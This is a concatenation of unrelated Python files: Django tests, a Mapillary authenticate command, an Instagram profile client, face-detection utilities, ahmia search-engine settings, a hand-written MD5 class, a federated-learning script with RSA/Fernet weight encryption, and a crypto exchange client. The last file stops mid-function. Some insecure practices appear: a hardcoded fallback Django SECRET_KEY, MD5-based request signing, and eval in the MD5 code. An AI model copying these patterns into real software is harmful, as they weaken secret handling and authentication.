givname="Иван", surname="Иванов" ) assert Person.objects.all().count() == 1 def test_delete(self): birth = Birth.objects.create() assert birth._person is not None person = mixer.blend(Person) assert Person.objects.all().count() == 2 birth._person = person birth.save() assert Person.objects.all().count() == 2 Birth.objects.create() assert Person.objects.all().count() == 3 mapillary_tools/commands/authenticate.py100-1000 import argparse import inspect from ..authenticate import authenticate class Command: name = "authenticate" help = "authenticate Mapillary users" def add_basic_arguments(self, parser: argparse.ArgumentParser): parser.add_argument( "--user_name", help="Mapillary user name", default=None, required=False ) parser.add_argument( "--user_email", help="User email, used to create Mapillary account", default=None, required=False, ) parser.add_argument( "--user_password", help="Password associated with the Mapillary user account", default=None, required=False, ) parser.add_argument( "--jwt", help="Mapillary user access token", default=None, required=False ) def run(self, vars_args: dict): authenticate( **( { k: v for k, v in vars_args.items() if k in inspect.getfullargspec(authenticate).args } ) ) Veristack/veristack-client-python0 """Package setup.""" from setuptools import find_packages from setuptools import setup with open('requirements.txt') as f: REQUIRED = f.read().splitlines() REQUIRED = [r for r in REQUIRED if not r.startswith('git')] setup( name='veristack-client', version='0.1', install_requires=REQUIRED, description='A client for interfacing to Veristack', author='', author_email='', url='https://veristack.com/', platforms='OS Independent', packages=find_packages(), include_package_data=True, classifiers=[ 'Development Status :: 3 - Alpha', 'Environment :: Plugins', 'Intended Audience :: Developers', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Topic :: Software Development :: Libraries' ] ) import requests import json base_url = 'https://www.instagram.com/{}/?__a=1' class Client: def get_common_profile(self, username): """ Get Instagram common profile by username Arguments: - username: ``str`` Return Profile that including full_name, profile_pic, follower and following """ if not username or username.isspace(): raise Exception('username should not be none or empty') return self._get_profile( self._send_request(username) ) @staticmethod def _send_request(username): return requests.get(base_url.format(username)) @staticmethod def _get_profile(response): if response.status_code == 404: raise Exception('profile not found') response.raise_for_status() profile_response = json.loads(response.content, encoding='utf-8') return Profile( profile_response['graphql']['user']['full_name'], profile_response['graphql']['user']['profile_pic_url_hd'], profile_response['graphql']['user']['edge_followed_by']['count'], profile_response['graphql']['user']['edge_follow']['count'] ) class Profile: def __init__(self, full_name, profile_pic, follower, following): self.full_name = full_name self.profile_pic = profile_pic self.follower = follower self.following = following tkianai/Facenet.Inferencedetector/utils.py import numpy as np import torch def decode(loc, priors, variances): """Decode locations from predictions using priors to undo the encoding we did for offset regression at train time. Args: loc (tensor): location predictions for loc layers, Shape: [num_priors,4] priors (tensor): Prior boxes in center-offset form. Shape: [num_priors,4]. variances: (list[float]) Variances of priorboxes Return: decoded bounding box predictions """ boxes = torch.cat(( priors[:, :2] + loc[:, :2] * variances[0] * priors[:, 2:], priors[:, 2:] * torch.exp(loc[:, 2:] * variances[1])), 1) boxes[:, :2] -= boxes[:, 2:] / 2 boxes[:, 2:] += boxes[:, :2] return boxes def decode_landm(pre, priors, variances): """Decode landm from predictions using priors to undo the encoding we did for offset regression at train time. Args: pre (tensor): landm predictions for loc layers, Shape: [num_priors,10] priors (tensor): Prior boxes in center-offset form. Shape: [num_priors,4]. variances: (list[float]) Variances of priorboxes Return: decoded landm predictions """ landms = torch.cat((priors[:, :2] + pre[:, :2] * variances[0] * priors[:, 2:], priors[:, :2] + pre[:, 2:4] * variances[0] * priors[:, 2:], priors[:, :2] + pre[:, 4:6] * variances[0] * priors[:, 2:], priors[:, :2] + pre[:, 6:8] * variances[0] * priors[:, 2:], priors[:, :2] + pre[:, 8:10] * variances[0] * priors[:, 2:], ), dim=1) return landms def py_cpu_nms(dets, thresh): """Pure Python NMS baseline.""" x1 = dets[:, 0] y1 = dets[:, 1] x2 = dets[:, 2] y2 = dets[:, 3] scores = dets[:, 4] areas = (x2 - x1 + 1) * (y2 - y1 + 1) order = scores.argsort()[::-1] keep = [] while order.size > 0: i = order[0] keep.append(i) xx1 = np.maximum(x1[i], x1[order[1:]]) yy1 = np.maximum(y1[i], y1[order[1:]]) xx2 = np.minimum(x2[i], x2[order[1:]]) yy2 = np.minimum(y2[i], y2[order[1:]]) w = np.maximum(0.0, xx2 - xx1 + 1) h = np.maximum(0.0, yy2 - yy1 + 1) inter = w * h ovr = inter / (areas[i] + areas[order[1:]] - inter) inds = np.where(ovr <= thresh)[0] order = order[inds + 1] return keep """Django project settings for ahmia.""" import os from os.path import dirname, join, abspath from decouple import config, Csv # Set the PROJECT_HOME variable. # This will be used to prepend to all file/directory paths. PROJECT_HOME = abspath(join(dirname(__file__), '..', '..')) # Build paths inside the project like this: path("ahmia") def ROOT_PATH(*x): return join(PROJECT_HOME, *x) ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv(), default='localhost, 127.0.0.1') # ELASTICSEARCH STUFF ELASTICSEARCH_TLS_FPRINT = config( 'ELASTICSEARCH_TLS_FPRINT', default="8C:DC:67:EA:C3:B3:97:94:92:30:81:35:8C:C6:D9:2A:E2:E6:8E:3E") # 'https://ahmia.fi/esconnection/' ELASTICSEARCH_SERVERS = config('ELASTICSEARCH_SERVERS', cast=Csv(), default='http://localhost:9200,') # BOTH-INDEX exists in case we want to look into both to onion and i2p addresses ~ currently unused # ELASTICSEARCH_BOTH_INDEX = config('ELASTICSEARCH_BOTH_INDEX', default='latest-crawl') ELASTICSEARCH_TOR_INDEX = config('ELASTICSEARCH_TOR_INDEX', default='latest-tor') ELASTICSEARCH_I2P_INDEX = config('ELASTICSEARCH_I2P_INDEX', default='latest-i2p') # common type for bot indices # todo change to _doc or rm when upgrade to ES 7.x ELASTICSEARCH_TYPE = config('ELASTICSEARCH_TYPE', default='doc') ELASTICSEARCH_TIMEOUT = config('ELASTICSEARCH_TIMEOUT', cast=int, default=60) # Email settings EMAIL_USE_TLS = config('EMAIL_USE_TLS', cast=bool, default=True) EMAIL_HOST = config('EMAIL_HOST', default='smtp.gmail.com') EMAIL_PORT = config('EMAIL_PORT', cast=int, default=587) EMAIL_HOST_USER = config('EMAIL_HOST_USER', default="") EMAIL_HOST_PASSWORD = config('EMAIL_HOST_PASSWORD', default="") DEFAULT_FROM_EMAIL = config('DEFAULT_FROM_EMAIL', default=EMAIL_HOST_USER) RECIPIENT_LIST = config('RECIPIENT_LIST', cast=Csv(), default=DEFAULT_FROM_EMAIL) # Local time zone for this installation. Choices can be found here: # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name # although not all choices may be available on all operating systems. # On Unix systems, a value of None will cause Django to use the same # timezone as the operating system. # If running in a Windows environment this must be set to the same as your # system time zone. TIME_ZONE = 'America/Chicago' # todo Isn't TIME_ZONE theoretically useless without USE_TZ=True? # Language code for this installation. All choices can be found here: # http://www.i18nguy.com/unicode/language-identifiers.html LANGUAGE_CODE = 'en-us' SITE_ID = 1 # If you set this to False, Django will make some optimizations so as not # to load the internationalization machinery. USE_I18N = True # If you set this to False, Django will not format dates, numbers and # calendars according to the current locale USE_L10N = True # STATIC # ------------------------------------------------------------------------------ # https://docs.djangoproject.com/en/dev/ref/settings/#static-url STATIC_URL = '/static/' # Absolute path to the directory where collectstatic will collect static files for deployment. # https://docs.djangoproject.com/en/dev/ref/settings/#static-root STATIC_ROOT = ROOT_PATH('staticfiles/') # Additional locations the staticfiles app will traverse if the FileSystemFinder finder is enabled # https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-STATICFILES_DIRS # STATICFILES_DIRS = [ # ROOT_PATH('ahmia/static/'), # ROOT_PATH('search/static/'), # ROOT_PATH('stats/static/') # ] # List of finder classes that know how to find static files in various locations. # https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders STATICFILES_FINDERS = [ 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ] # Make this unique, and don't share it with anybody. SECRET_KEY = config('SECRET_KEY', default='%*ertqgmh3(t_d=i&ojuc!02wnech_nq#1*s7dbv3h=&ruf7*b') MIDDLEWARE_CLASSES = ( 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', ) ROOT_URLCONF = 'ahmia.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.contrib.auth.context_processors.auth', 'django.template.context_processors.request', 'django.contrib.messages.context_processors.messages', ], # loads custom template tags 'libraries': { 'ahmia_tags': 'ahmia.template_tags', } } }, ] INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sites', 'django.contrib.admin', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'ahmia', 'search', 'stats' ) # https://docs.djangoproject.com/en/1.11/ref/contrib/messages/#configuring-the-message-engine MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage' # *** LOGGING *** # # Log everything to the logs directory at the top LOGFILE_ROOT = ROOT_PATH('logs') if not os.path.exists(LOGFILE_ROOT): print("Creating logs empty folder %s" % LOGFILE_ROOT) os.mkdir(LOGFILE_ROOT) # Disable automatic default configuration process to apply our own settings LOGGING_CONFIG = None # Logging LOG_LEVEL = config('LOG_LEVEL', default='INFO') # Debug, Info, Warning, Error, Critical # Common settings ~ This dict is being updated inside dev.py / prod.py LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'verbose': { 'format': "[%(asctime)s] %(levelname)s [%(name)s:%(filename)s:%(lineno)s] %(message)s", 'datefmt': "%d/%b/%Y %H:%M:%S" }, 'simple': { 'format': '%(levelname)s %(message)s' }, }, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse', } }, } # How many days to keep usage statistics related information USAGE_STATS_DAYS = config('USAGE_STATS_DAYS', cast=int, default=30) md5.py # -*- coding: utf-8 -*- """ @author: @Due_date: Dec. 12th, 2019 """ import math class Md5Checker: def __init__(self, byte_stream): self.byte_stream = byte_stream self.A = 0x67452301 self.B = 0xefcdab89 self.C = 0x98badcfe self.D = 0x10325476 self.md5_result = None self.s = [ 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21 ] self.K = [] for i in range(64): self.K.append(math.floor(2 ** 32 * abs(math.sin(i + 1)))) self.padding() print('Bytes after padding(pay attention to the higher and lower bytes direction in each 32 bits):') print(bin(self.byte_stream)) print(hex(self.byte_stream)) print() self.chunk_num = (len(bin(self.byte_stream)[2:]) + 511) // 512 self.chunks = [] dup_bytes = self.byte_stream for i in range(self.chunk_num): self.chunks.append(dup_bytes % (2 ** 512)) dup_bytes = dup_bytes >> 512 self.chunks.reverse() print('\n'.join(['Chunks:'] + list(map(lambda chunk: bin(chunk)[2:], self.chunks)))) print() def padding(self): if self.byte_stream == 0: self.byte_stream = 0b1<<511 return origin_length = (len(bin(self.byte_stream)[2:]) + 7) // 8 * 8 self.byte_stream = self.byte_stream << 8 self.byte_stream += 0x80 cur_length = origin_length + 8 padding_length = 512 - 64 - cur_length % 512 if padding_length < 0: padding_length += 512 self.byte_stream = self.byte_stream << padding_length self.byte_stream = (self.byte_stream << 64) + origin_length % (2 ** 64) def F(self, X, Y, Z): return (((X & Y) | ((0xffffffff - (X & 0xffffffff)) & Z)) & 0xffffffff) def G(self, X, Y, Z): return (((X & Z) | (Y & (0xffffffff - (Z & 0xffffffff)))) & 0xffffffff) def H(self, X, Y, Z): return ((X ^ Y ^ Z) & 0xffffffff) def I(self, X, Y, Z): return ((Y ^ (X | (0xffffffff - (Z & 0xffffffff)))) & 0xffffffff) def FF(self, a, b, c, d, Mj, s, ti): # print('FF:') # print(hex(a), hex(b), hex(c), hex(d), hex(Mj), s, hex(ti)) a += (self.F(b, c, d) & 0xffffffff) + Mj + ti a = ((a & 0xffffffff) << s) | ((a & 0xffffffff) >> (32 - s)) a += b # print(hex(a), hex(b), hex(c), hex(d)) # print(a, b, c, d) # print() return a & 0xffffffff def GG(self, a, b, c, d, Mj, s, ti): # print('GG:') # print(hex(a), hex(b), hex(c), hex(d), hex(Mj), s, hex(ti)) a += (self.G(b, c, d) & 0xffffffff) + Mj + ti a = ((a & 0xffffffff) << s) | ((a & 0xffffffff) >> (32 - s)) a += b # print(hex(a), hex(b), hex(c), hex(d)) # print() return a & 0xffffffff def HH(self, a, b, c, d, Mj, s, ti): # print('HH:') # print(hex(a), hex(b), hex(c), hex(d), hex(Mj), s, hex(ti)) a += (self.H(b, c, d) & 0xffffffff) + Mj + ti a = ((a & 0xffffffff) << s) | ((a & 0xffffffff) >> (32 - s)) a += b # print(hex(a), hex(b), hex(c), hex(d)) # print() return a & 0xffffffff def II(self, a, b, c, d, Mj, s, ti): # print('II:') # print(hex(a), hex(b), hex(c), hex(d), hex(Mj), s, hex(ti)) a += (self.I(b, c, d) & 0xffffffff) + Mj + ti a = ((a & 0xffffffff) << s) | ((a & 0xffffffff) >> (32 - s)) a += b # print(hex(a), hex(b), hex(c), hex(d)) # print() return a & 0xffffffff def reverse4bytes(self, four_bytes): four_bytes = hex(four_bytes)[2:] four_bytes = '0' * (8 - len(four_bytes)) + four_bytes four_bytes = [four_bytes[:2], four_bytes[2:4], four_bytes[4:6], four_bytes[6:]] four_bytes.reverse() return eval('0x' + ''.join(four_bytes)) def single_chunk_process(self, chunk, is_last): words = [] for i in range(16): words.append(self.reverse4bytes(chunk & 0xffffffff)) chunk = chunk >> 32 words.reverse() if is_last: tmp = words[-1] words[-1] = words[-2] words[-2] = tmp words[-1] = self.reverse4bytes(words[-1]) words[-2] = self.reverse4bytes(words[-2]) print('\n'.join(['words'] + list(map(lambda word: bin(word)[2:], words)))) a, b, c, d = self.A, self.B, self.C, self.D print('abcd:', hex(a), hex(b), hex(c), hex(d)) for i in range(4): a = self.FF(a, b, c, d, words[4 * i + 0], self.s[4 * i + 0], self.K[4 * i + 0]) d = self.FF(d, a, b, c, words[4 * i + 1], self.s[4 * i + 1], self.K[4 * i + 1]) c = self.FF(c, d, a, b, words[4 * i + 2], self.s[4 * i + 2], self.K[4 * i + 2]) b = self.FF(b, c, d, a, words[4 * i + 3], self.s[4 * i + 3], self.K[4 * i + 3]) # print(hex(a), hex(b), hex(c), hex(d)) words_id = 1 for i in range(4): a = self.GG(a, b, c, d, words[words_id], self.s[4 * i + 16], self.K[4 * i + 16]) words_id += 5 words_id %= 16 d = self.GG(d, a, b, c, words[words_id], self.s[4 * i + 17], self.K[4 * i + 17]) words_id += 5 words_id %= 16 c = self.GG(c, d, a, b, words[words_id], self.s[4 * i + 18], self.K[4 * i + 18]) words_id += 5 words_id %= 16 b = self.GG(b, c, d, a, words[words_id], self.s[4 * i + 19], self.K[4 * i + 19]) words_id += 5 words_id %= 16 words_id = 5 for i in range(4): a = self.HH(a, b, c, d, words[words_id], self.s[4 * i + 32], self.K[4 * i + 32]) words_id += 3 words_id %= 16 d = self.HH(d, a, b, c, words[words_id], self.s[4 * i + 33], self.K[4 * i + 33]) words_id += 3 words_id %= 16 c = self.HH(c, d, a, b, words[words_id], self.s[4 * i + 34], self.K[4 * i + 34]) words_id += 3 words_id %= 16 b = self.HH(b, c, d, a, words[words_id], self.s[4 * i + 35], self.K[4 * i + 35]) words_id += 3 words_id %= 16 words_id = 0 for i in range(4): a = self.II(a, b, c, d, words[words_id], self.s[4 * i + 48], self.K[4 * i + 48]) words_id += 7 words_id %= 16 d = self.II(d, a, b, c, words[words_id], self.s[4 * i + 49], self.K[4 * i + 49]) words_id += 7 words_id %= 16 c = self.II(c, d, a, b, words[words_id], self.s[4 * i + 50], self.K[4 * i + 50]) words_id += 7 words_id %= 16 b = self.II(b, c, d, a, words[words_id], self.s[4 * i + 51], self.K[4 * i + 51]) words_id += 7 words_id %= 16 # print('abcd:', hex(a), hex(b), hex(c), hex(d)) # print('abcd:', bin(a), bin(b), bin(c), bin(d)) # print('ABCD:', hex(self.A), hex(self.B), hex(self.C), hex(self.D)) # print('ABCD:', bin(self.A), bin(self.B), bin(self.C), bin(self.D)) self.A += a self.B += b self.C += c self.D += d self.A &= 0xffffffff self.B &= 0xffffffff self.C &= 0xffffffff self.D &= 0xffffffff print('abcd:', hex(self.A), hex(self.B), hex(self.C), hex(self.D)) def hashing(self): i = 0 for chunk in self.chunks[:-1]: print('Chunk %d:' % i) self.single_chunk_process(chunk, False) i += 1 print('Chunk %d:' % i) self.single_chunk_process(self.chunks[-1], True) self.A = hex(self.reverse4bytes(self.A))[2:] self.B = hex(self.reverse4bytes(self.B))[2:] self.C = hex(self.reverse4bytes(self.C))[2:] self.D = hex(self.reverse4bytes(self.D))[2:] self.A = '0' * (8 - len(self.A)) + self.A self.B = '0' * (8 - len(self.B)) + self.B self.C = '0' * (8 - len(self.C)) + self.C self.D = '0' * (8 - len(self.D)) + self.D self.md5_result = self.A + self.B + self.C + self.D def get_hash(self): if self.md5_result is None: self.hashing() return self.md5_result if __name__ == '__main__': md5_obj = Md5Checker(0) print(md5_obj.get_hash()) import numpy as np import random import cv2 import os from struct import unpack, pack import argparse import socket, pickle import sys import time import subprocess import rsa as rsa_base from imutils import paths from sklearn.model_selection import train_test_split from sklearn.preprocessing import LabelBinarizer from sklearn.model_selection import train_test_split from sklearn.utils import shuffle from sklearn.metrics import accuracy_score import tensorflow as tf from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Conv2D from tensorflow.keras.layers import MaxPooling2D from tensorflow.keras.layers import Activation from tensorflow.keras.layers import Flatten from tensorflow.keras.layers import Dense from tensorflow.keras.optimizers import SGD from tensorflow.keras import backend as K import cryptography from cryptography.hazmat.backends import default_backend from cryptography.hazmat.backends.interfaces import RSABackend from cryptography.hazmat.primitives.asymmetric import rsa, padding from cryptography.hazmat.primitives import serialization, hashes from cryptography.fernet import Fernet import rsa as rsa_base from PIL import Image import base64 import hashlib import json import logging #import tflite_runtime.interpreter as tflite #declear path to your mnist data folder img_path = '/home/ec2-user/nitro-enclave-FL/org1/covid_data/' #get the path list using the path object image_paths = list(paths.list_images(img_path)) def load(paths, verbose=-1): '''expects images for each class in seperate dir, e.g all digits in 0 class in the directory named 0 ''' data = list() labels = list() # loop over the input images for (i, imgpath) in enumerate(paths): # load the image and extract the class labels im_gray = cv2.imread(imgpath, cv2.IMREAD_GRAYSCALE) resize = cv2.resize(im_gray,(32,32)) image = np.array(resize).flatten() label = imgpath.split(os.path.sep)[-2] # scale the image to [0, 1] and add to list data.append(image/255) labels.append(label) # show an update every `verbose` images if verbose > 0 and i > 0 and (i + 1) % verbose == 0: print("[INFO] processed {}/{}".format(i + 1, len(paths))) # return a tuple of the data and labels return data, labels #apply our function image_list, label_list = load(image_paths, verbose=10000) #binarize the labels lb = LabelBinarizer() label_list = lb.fit_transform(label_list) #split data into training and test set X_train, X_test, y_train, y_test = train_test_split(image_list, label_list, test_size=0.1, random_state=42) data = list(zip(X_train, y_train)) def batch_data(data_shard, bs=32): '''Takes in a clients data shard and create a tfds object off it args: shard: a data, label constituting a client's data shard bs:batch size return: tfds object''' #seperate shard into data and labels lists data, label = zip(*data_shard) dataset = tf.data.Dataset.from_tensor_slices((list(data), list(label))) return dataset.shuffle(len(label)).batch(bs) #process and batch the training data for each client client_batched = batch_data(data) #process and batch the test set test_batched = tf.data.Dataset.from_tensor_slices((X_test, y_test)).batch(len(y_test)) class SimpleMLP: @staticmethod def build(shape, classes): model = Sequential() model.add(Dense(200, input_shape=(shape,))) model.add(Activation("relu")) model.add(Dense(200)) model.add(Activation("relu")) model.add(Dense(classes)) model.add(Activation("softmax")) return model lr = 0.01 comms_round = 10 loss='categorical_crossentropy' metrics = ['accuracy'] optimizer = SGD(learning_rate=lr, decay=lr / comms_round, momentum=0.9 ) #initialize global model smlp_global = SimpleMLP() global_model = smlp_global.build(1024, 4) # get the global model's weights - will serve as the initial weights for all local models global_weights = global_model.get_weights() #initial list to collect local model weights after scalling scaled_local_weight_list = list() smlp_local1 = SimpleMLP() local_model1 = smlp_local1.build(1024, 4) local_model1.compile(loss=loss, optimizer=optimizer, metrics=metrics) #set local model weight to the weight of the global model local_model1.set_weights(global_weights) #fit local model with client's data local_model1.fit(client_batched, epochs=1, verbose=0) def weight_scalling_factor(client_trn_data): #get the bs bs = list(client_trn_data)[0][0].shape[0] #first calculate the total training data points across clinets global_count = (6368+6368)*32#sum([tf.data.experimental.cardinality(clients_trn_data[client_name]).numpy() for client_name in client_names])*bs # get the total number of data points held by a client local_count = tf.data.experimental.cardinality(client_trn_data).numpy()*bs #print(local_count) #6368 return local_count/global_count def scale_model_weights(weight, scalar): '''function for scaling a models weights''' weight_final = [] steps = len(weight) for i in range(steps): weight_final.append(scalar * weight[i]) return weight_final def sum_scaled_weights(scaled_weight_list): '''Return the sum of the listed scaled weights. The is equivalent to scaled avg of the weights''' new_weights = list() for weights_list_tuple in zip(*scaled_weight_list): new_weights.append( [np.array(weights_).mean(axis=0)\ for weights_ in zip(*weights_list_tuple)]) return new_weights #scale the model weights and add to list scaling_factor = weight_scalling_factor(client_batched) scaled_weights = scale_model_weights(local_model1.get_weights(), scaling_factor) scaled_local_weight_list.append(scaled_weights) ######################################### #declear path to your mnist data folder img_path = '/home/ec2-user/nitro-enclave-FL/org2/covid_data/' #get the path list using the path object image_paths = list(paths.list_images(img_path)) #apply our function image_list, label_list = load(image_paths, verbose=10000) #binarize the labels lb = LabelBinarizer() label_list = lb.fit_transform(label_list) #split data into training and test set X_train, X_test, y_train, y_test = train_test_split(image_list, label_list, test_size=0.1, random_state=42) data = list(zip(X_train, y_train)) #process and batch the training data for each client client_batched = batch_data(data) #process and batch the test set test_batched = tf.data.Dataset.from_tensor_slices((X_test, y_test)).batch(len(y_test)) smlp_local2 = SimpleMLP() local_model2 = smlp_local2.build(1024, 4) local_model2.compile(loss=loss, optimizer=optimizer, metrics=metrics) #set local model weight to the weight of the global model local_model2.set_weights(global_weights) #fit local model with client's data local_model2.fit(client_batched, epochs=1, verbose=0) for x in range(len(local_model2.get_weights())): print(local_model2.get_weights()[x].shape) bs = list(client_batched)[0][0].shape[0] local_count2 = tf.data.experimental.cardinality(client_batched).numpy()*bs print(local_count2) #6368 #scale the model weights and add to list scaling_factor = weight_scalling_factor(client_batched) scaled_weights = scale_model_weights(local_model2.get_weights(), scaling_factor) scaled_local_weight_list.append(scaled_weights) #to get the average over all the local model, we simply take the sum of the scaled weights average_weights = sum_scaled_weights(scaled_local_weight_list) npa = list() for x in range(len(average_weights)): npa.append(np.asarray(average_weights[x], dtype=np.float32)) print(len(npa)) for x in range(len(npa)): print(npa[x].shape) global_model.set_weights(npa) # print(global_model.get_weights()) # print('done') global_weights = global_model.get_weights() def encrypt_in_memory(incoming_bytes: bytes, symmetric_key): encrypted_contents = Fernet(symmetric_key).encrypt(incoming_bytes) return encrypted_contents def load_rsa_keys(): with open('parent_public_key.pem', 'rb') as f: pubkey = rsa_base.PublicKey.load_pkcs1(f.read()) with open('parent_private_key.pem', 'rb') as f: privkey = rsa_base.PrivateKey.load_pkcs1(f.read()) return (pubkey, privkey) data = b'' (parent_public_key, parent_private_key) = load_rsa_keys() data += parent_public_key._save_pkcs1_pem() parent_public_key = rsa_base.PublicKey.load_pkcs1(data) symmetric_key = Fernet.generate_key() encrypted_key = rsa_base.encrypt(symmetric_key, parent_public_key) encrypted_weights = list() for x in range(len(global_weights)): encrypted_content = encrypt_in_memory(global_weights[x].tobytes(), symmetric_key) encrypted_weights.append(encrypted_content) #print(bytes(global_weights[x])) #print(np.array(bytes(global_weights[x]))) # print(len(global_weights)) # print(len(encrypted_weights)) # print(type(encrypted_weights)) # for x in range(len(encrypted_weights)): # print(encrypted_weights[x]) # print(type(encrypted_weights[x])) # break def decrypt_in_memory(encrypted_contents: bytes, encrypted_key: bytes, private_key): decrypted_key = rsa_base.decrypt(encrypted_key, private_key) decrypted_contents = Fernet(decrypted_key).decrypt(encrypted_contents) return decrypted_contents (parent_public_key, parent_private_key) = load_rsa_keys() decrypted_weights = list() for x in range(len(encrypted_weights)): decrypted_content = decrypt_in_memory(encrypted_weights[x], encrypted_key, parent_private_key) decrypted_weights.append(np.frombuffer(decrypted_content, dtype=np.float32)) # print(decrypted_weights) # print('#############################\n############################') # print(global_weights) # print(len(decrypted_weights)) # print(type(decrypted_weights)) # for x in range(len(decrypted_weights)): # print(decrypted_weights[x]) # print(type(decrypted_weights[x])) # break #print(np.array(decrypted_contents)) np.save('global_weights.npy', global_model.get_weights(), allow_pickle=True) # b = np.load('a.npy', allow_pickle=True) def get_public_key(public_key_path: str, get_bytes=True): with open(public_key_path, 'rb') as key_file: public_key = serialization.load_pem_public_key( key_file.read(), backend=default_backend() ) public_key_bytes = public_key.public_bytes( encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo ) if get_bytes: return public_key_bytes else: return public_key def encrypt(file_path, public_key_path): public_key = get_public_key(public_key_path, get_bytes=False) symmetric_key = Fernet.generate_key() encrypted_key = public_key.encrypt( symmetric_key, padding=padding.OAEP( mgf=padding.MGF1(algorithm=hashes.SHA256()), algorithm=hashes.SHA256(), label=None ) ) with open(file_path, 'rb') as file_in: encrypted_contents = Fernet(symmetric_key).encrypt(file_in.read()) with open(file_path+'.encrypted', 'wb') as file_out: file_out.write(encrypted_contents) return encrypted_key #encrypted_key = encrypt('global_weights.npy', 'parent_public_key.pem') from io import BytesIO np_bytes = BytesIO() np.save(np_bytes, global_model.get_weights(), allow_pickle=True) np_bytes = np_bytes.getvalue() load_bytes = BytesIO(np_bytes) loaded_np = np.load(load_bytes, allow_pickle=True) # print(b) # print(global_model.get_weights()) #print(local_model2.get_weights()) # weights = list() # weights.append(global_weights) # weights.append(local_weights) # new_weights = list() # for weights_list_tuple in zip(*weights): # new_weights.append( # [np.array(weights_).mean(axis=0)\ # for weights_ in zip(*weights_list_tuple)]) # print(global_weights) # global_model.set_weights(new_weights) # global_weights = global_model.get_weights() # print(global_weights) # data_string = pickle.dumps(global_weights) # data_arr = pickle.loads(data_string) # global_model.save('saved_model/global_model') # new_model = tf.keras.models.load_model('saved_model/global_model') # # Convert the model # converter = tf.lite.TFLiteConverter.from_saved_model('saved_model/global_model') # path to the SavedModel directory # tflite_model = converter.convert() # # Save the model. # with open('model.tflite', 'wb') as f: # f.write(tflite_model) # # Load TFLite model and allocate tensors. # print('loading .tflite model...') # # TFLITE model was converted from the full h5 model stored here: https://github.com/uyxela/Skin-Lesion-Classifier/ # interpreter = tflite.Interpreter(model_path="model.tflite") # print('done.') # interpreter.allocate_tensors() # # Get input and output tensors. # input_details = interpreter.get_input_details() # output_details = interpreter.get_output_details() # all_layers_details = interpreter.get_tensor_details() # # printing the list using loop # print(global_weights) # print('###########################################################') # print(npa) # arr = list() # for x in range(len(global_weights)): # arr.append(global_weights[x].tobytes()) # arr1 = list() # for x in range(len(arr)): # arr1.append(np.frombuffer(arr[x], dtype=np.float32)) # print(arr1) #print(decrypted_weights) # print(global_weights) # data_string = pickle.dumps(npa) # data_arr = pickle.loads(data_string) # print(data_arr) from utils import Order from exchanges.base import ExchangeService from requestUtils.request import get, post from exchanges.sisty.sisty_key import MD5Key from twisted.python.failure import Failure import hashlib import urllib import time from twisted.internet import reactor from twisted.logger import Logger import json def httpGet(url, resource, params, callback=None, errback=None): headers = { "Content-type": ["application/x-www-form-urlencoded"], 'User-Agent': ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'], } postdata = urllib.parse.urlencode(params) # print(url + resource + '?' + postdata) d = get( reactor, url=url + resource + '?' + postdata, headers=headers ) if callback: d.addCallback(callback) if errback: d.addErrback(errback) return d def httpPost(url, resource, params, callback=None, errback=None): headers = { "Content-type": ["application/x-www-form-urlencoded"], 'User-Agent': ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'], } postdata = urllib.parse.urlencode(params) # print(url + resource) # print(postdata) d = post( reactor, url=url + resource, headers=headers, body=postdata ) if callback: d.addCallback(callback) if errback: d.addErrback(errback) return d def getSign(*args): data = '' for arg in args: assert isinstance(arg, str) data += arg return hashlib.md5(data.encode("utf8")).hexdigest().upper() class Sisty(ExchangeService): log = Logger() def __init__(self, url, md5Key, userId, secret): self.__url = url self.__md5Key = md5Key self.__userId = userId self.__secret = secret def getSymbol(self, pairs): coin, money = pairs return '_'.join((coin, money)).lower() def ebFailed(self, failure): self.log.error("{failure}", failure=failure) return failure def getTicker(self, pairs): URL = "/trademarket/v1/api/ticker" params = { 'market': self.getSymbol(pairs), } def handleBody(body): data = json.loads(body) assert 'ticker' in data return data['ticker'] return httpGet(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def getOrderBook(self, pairs): URL = "/trademarket/v1/api/depth" # self.log.debug("{url}", url=self.__url) params = { 'market': self.getSymbol(pairs), } def handleBody(body): data = json.loads(body) assert 'bids' in data and 'asks' in data bids = data['bids'] asks = data['asks'] return [bids, asks] return httpGet(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def trade(self, pairs, price, amount, tradeType): URL = "/tradeOpen/v2/apiAddEntrustV2Robot" cipherText = getSign(self.__userId, pairs[0], self.__secret, pairs[1], self.__md5Key) # self.log.debug("{cipherText}{key}", cipherText=cipherText, key=self.__md5Key) params = { 'coinName': pairs[0], 'payCoinName': pairs[1], 'amount': amount, 'price': price, 'type': tradeType, # 1: buy, 2: sell 'cipherText': cipherText, 'secret': self.__secret, 'userId': self.__userId } def 